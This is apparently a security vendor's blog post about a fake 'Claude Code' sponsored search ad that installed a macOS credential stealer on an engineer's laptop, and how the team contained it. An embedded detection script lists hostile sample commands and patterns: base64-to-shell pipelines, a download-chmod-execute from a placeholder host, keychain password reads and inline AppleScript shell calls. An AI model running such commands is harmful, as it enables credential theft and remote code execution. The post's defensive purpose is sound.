- What: A fake Claude download on Google led to malware execution
- Impact: Users may be at risk if they click on suspicious sponsored results
Tools Change. Habits Don’t. We Saw It Up Close.
Published: April 9, 2026
By: Chris Henderson

Most people expect scams and hacks to show up in their inbox or DMs, not in a place they’ve been conditioned to trust, like the top of page one on Google. But when the trap shows up somewhere that familiar, even the brightest among us can get caught off guard.

Not too long ago, a Huntress engineer opened Google and searched for “Claude Code.” He clicked the top sponsored result, and knew within seconds that something was wrong. He shut his MacBook and reported it immediately. By then, the malware was already running.

As our CSO, Eric Stride, put it: “Most people don’t expect the top Google result to be malicious, but occasionally, it is.”

A “sponsored” result at the top of a page still carries a lot of built-in credibility. If it looks familiar, many of us will assume it’s safe and keep moving. Not surprisingly, attackers understand that habit well. They know they don’t have to fool you for long. They understand your user journey, and they know you’re likely only skimming for results that appear right. They only need to set up a page that looks normal enough for you to trust it in the middle of a busy day. With AI, this has never been easier.

[Image: The legitimate search and the questionable result]

When somebody with deep security experience can get caught this way, it reinforces the breadth, efficiency, and improved quality of this tradecraft. In this case, an automated script designed to steal credentials began running on the engineer’s MacBook, using base64 encoding and gzip compression to disguise what it was doing. Once decoded, it pulled down a second payload, marked it executable, and launched it. That payload went straight for the macOS keychain, specifically Claude Code credentials. Our tooling flagged the activity as illegitimate.
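As an added illustration (not Huntress tooling, and not anything recovered from this incident), here is a small triage script that scores constructed macOS process command lines against heuristics for the behaviours this post describes: a base64/gzip-wrapped shell pipeline, a download that is marked executable and launched in one command, keychain credential reads, and AppleScript carrying an inline shell payload. The rule patterns, weights, threshold, sample events and the example keychain service name are all assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed process-event command lines (not from the Huntress incident); the
# first four mirror behaviours the post describes, the last two are benign.
SAMPLE_EVENTS = [
    "bash -c 'echo H4sIAAAA... | base64 -d | gunzip | sh'",
    "curl -fsSL https://example.invalid/stage2 -o /tmp/.s && chmod +x /tmp/.s && /tmp/.s",
    "security find-generic-password -s 'claude-code-credentials-EXAMPLE' -w",
    "osascript -e 'do shell script \"echo aGVsbG8= | base64 -d | sh\"'",
    "git clone https://github.com/example/project.git",
    "osascript -e 'display notification \"build finished\"'",
]

# Heuristic rules: (id, weight, pattern). Weights and patterns are assumptions
# made for this example, not Huntress detection logic.
RULES = [
    ("b64_pipe_to_shell", 3, re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:sh|bash|zsh)\b")),
    ("gzip_pipe_to_shell", 2, re.compile(r"\b(?:gunzip|gzip\s+-d|zcat)\b.*\|\s*(?:sh|bash|zsh)\b")),
    # download, chmod +x on a path, then that same path executed in one command
    ("download_chmod_exec", 3, re.compile(r"\b(?:curl|wget)\b.*chmod\s+\+x\s+(\S+).*\1")),
    ("keychain_read", 4, re.compile(r"\bsecurity\s+(?:find-generic-password|find-internet-password|dump-keychain)\b")),
    ("osascript_inline", 3, re.compile(r"\bosascript\b.*-e\b.*(?:base64|do shell script)")),
]
THRESHOLD = 3  # assumed alerting threshold on the summed weights

@dataclass
class Finding:
    index: int      # position of the event in the input list
    score: int      # summed weights of matching rules
    rules: list     # ids of matching rules
    cmdline: str

def match_rules(cmdline: str) -> list:
    """Return the ids of every rule whose pattern matches the command line."""
    return [rid for rid, _w, rx in RULES if rx.search(cmdline)]

def score(cmdline: str) -> int:
    """Sum the weights of all matching rules."""
    return sum(w for _rid, w, rx in RULES if rx.search(cmdline))

def triage(events) -> list:
    """Return a Finding for each event at or above THRESHOLD, highest score first."""
    found = [Finding(i, score(c), match_rules(c), c) for i, c in enumerate(events)]
    return sorted((f for f in found if f.score >= THRESHOLD), key=lambda f: -f.score)

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[score {f.score}] event {f.index}: {', '.join(f.rules)}")
```

Each rule on its own is noisy; the value is in stacking them, so that a single process chain hitting several of them rises to the top of the queue.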
The malware was also running an obfuscated AppleScript to make its behavior harder to read. Each layer was there for a reason.

[Image: Huntress incident report depicting adversary activity]

The attackers were after credentials and the access they provide, like source code, proprietary product data, and internal systems. They didn’t get them. That’s because the engineer caught and reported the mistake immediately, and our SOC was already moving. When he called to report what happened, the SOC was already opening a ticket based on an alert the malware had triggered. The SOC moved quickly to rotate credentials and review the logs. By the time the team had worked through what happened, there was no sign the attackers had tried to use the credentials they were after.

So why are we telling this story? Because it’s moments like this where your business’ resilience gets put to the test. Because transparency is more useful than sanitized perfection. A prominent security engineer clicked the wrong link. It happens. What matters is what an organization does in the seconds, minutes, and hours after.

A resilient security program doesn't assume people won't make mistakes. It assumes they will, and it's ready before they do. That's what made the difference here: purpose-built technology and the people around it moving fast and without ego. The setup protecting a cybersecurity company is the same setup protecting yours.

There's an old line in security you’ve certainly heard: “It's not if you'll get hit, but when.” In 2026, that's not enough anymore. The bar is higher. It comes down to how you respond, and whether the people around you are part of the solution.

Part of building a resilient organization is reiterating the basics. Here are the foundational lessons we’re preaching internally to all our teammates.

- Slow down when something feels off, especially if you’re downloading a tool from a domain you weren’t expecting.
- Treat sponsored results with more suspicion than you used to, because the top result is no longer automatically the safest one.
- Use approved AI tools for work, and keep confidential information out of anything that hasn’t been vetted.
- Protect your credentials with MFA, unique passwords, and a password manager.
- If something does go wrong, report it quickly. Embarrassment usually makes incidents worse, while speed gives your team a chance to contain them.

The engineer at the center of this story immediately raised his hand, with no hesitation. That’s what we call an “ethical badass.” He didn’t let ego get the best of him, nor did he attempt to quietly fix it himself. That instinct matters as much as any tool. Phishing lures are getting better by the day, and the only thing keeping pace is a culture where reporting is quickly celebrated, not punished. Destigmatizing the oops is overdue. That starts with us.